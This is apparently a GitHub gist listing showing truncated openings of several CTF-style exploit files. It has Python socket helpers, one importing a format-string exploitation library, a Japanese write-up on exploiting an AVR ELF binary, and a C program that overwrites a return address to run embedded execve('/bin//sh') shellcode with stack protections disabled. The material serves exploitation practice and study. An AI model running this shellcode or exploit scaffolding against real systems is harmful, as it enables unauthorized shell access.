This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# -*- coding:utf-8 -*- | |
import socket, struct, telnetlib | |
# --- common funcs --- | |
def sock(remoteip, remoteport): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((remoteip, remoteport)) | |
return s, s.makefile('rw', bufsize=0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# -*- coding: utf-8 -*- | |
import struct, socket, sys, telnetlib | |
def sock(remoteip="127.0.0.1", remoteport=1234): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((remoteip, remoteport)) | |
return s, s.makefile('rw', bufsize=0) | |
def read_until(f, delim='\n'): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Arduinoで有名なAtmel AVRのELFバイナリへのexploit | |
(概要) | |
レジスタの扱い方やスタックがエンプティスタックになっている等,x86とは異なる特徴があるが省略する. | |
最も特徴的なのはハーバードアーキテクチャであることだろう. | |
機械語用のROMとデータ用のRAMが全く別個に配置されている.そのためマシンコードのデータを読み取るには特殊な命令が必要になる. | |
(最初はデータ用領域の0x1800をずっとreadしていて謎のデータが出てきていたのでココで詰まった) | |
バイナリ中にあるlpmという命令がまさにそれである. | |
また,挙動が把握しづらい点として,実機でどうかは分からないがret命令で不正なアドレスがある時に例外は発生せず,そのまま下の命令を実行し始めるという挙動が確認できた. | |
その点を理解したうえでretでPCを書き換えられている場合とそうでない場合の挙動の違いからreturn addressまでのオフセットを求めた(デバッガのシミュレータで求めても良いし逆アセンブル結果ちゃんと見れば求まる). |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# -*- coding: utf-8 -*- | |
import struct, socket, sys, telnetlib | |
from libformatstr import FormatStr | |
def sock(remoteip="127.0.0.1", remoteport=1234): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((remoteip, remoteport)) | |
return s, s.makefile('rw', bufsize=0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
//gcc exec_shellcode.c -o exec_shellcode -m32 -z execstack -fno-stack-protector | |
char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" | |
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; | |
int main(){ | |
int a=0xdeadbeef; | |
//pointer incremetn by its size | |
*(int *)(&a + 2) = sc; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
まじめにやる |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
test content |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ないよ |